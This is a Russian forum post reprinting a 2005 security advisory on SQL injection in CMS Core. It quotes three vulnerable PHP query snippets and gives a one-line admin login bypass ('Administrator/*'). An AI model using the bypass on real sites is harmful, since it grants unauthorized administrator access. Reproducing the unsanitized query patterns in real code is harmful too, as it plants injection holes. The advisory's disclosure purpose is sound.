Статьи SQL injection in CMScore (найдено ghc)

Discussion in 'Статьи' started by Rebz, 6 Feb 2005.

  1. Rebz

    Rebz Super Moderator
    Staff Member

    Joined:
    8 Nov 2004
    Messages:
    4,074
    Likes Received:
    1,526
    Reputations:
    1,126
    *==========================================*/
    // GHC -> CMS CORE <- ADVISORY
    // Продукт: CMS Core
    // Адрес: http://chipmunk-scripts.com/scripts/cmscore.php
    // Уязвимость: SQL injection
    // Опасность: высокая
    /*==========================================*/

    [1] уязвимый скрипт: index.php

    ---
    Code:
    ---
    $EntryID=$_GET[EntryID];
    ...
    $article="SELECT * FROM CMS_articles where EntryID=$EntryID";
    ---
    ---

    Возможность sql инъекции:
    http://CMScore/index.php?EntryID=[SQL code]

    [2] уязвимый скрипт: index.php

    ---
    Code:
    ---
    $searchterm=$_POST[searchterm];
    ...
    $newselect="Select * FROM CMS_articles where title LIKE %$searchterm% OR shortdescription 
    LIKE %$searchterm% OR body LIKE %$searchterm% order by EntryID DESC LIMIT $start, 
    $numentries";
    ---
    ---

    Возможность SQL инъекции через переменную $searchterm из поисковой формы.

    [3] уязвимый скрипт: admin/authenticate.php

    ---
    Code:
    ---
    $username=$_POST[username];
    $password=$_POST[password];
    $password=md5($password);
    $query = "select * from CMS_logintable where username=$username and 
    password=$password"; 
    $result=mysql_query($query) or die("Could not Query");
    ---
    ---

    Возможность SQL инъекции чере переменную $username.

    [exploit]
    Заходим под именем
    Administrator/*
    на странице admin/index.php.

    [примечание]
    "Administrator" должно быть имя существующего пользователя.

    /* ================================================== */
    /* www.ghc.ru -- security games & challenges */
    /* ================================================== */
    /* greets to: 1dt.w0lf & RST.void.ru, D0G4 */
    /* & all quest hunters %) */
    /* ================================================== */
     
Loading...
Similar Threads - injection CMScore найдено
  1. eclipse
    Replies:
    0
    Views:
    6,347
  2. Boa
    Replies:
    78
    Views:
    61,401
  3. aka_zver
    Replies:
    2
    Views:
    10,151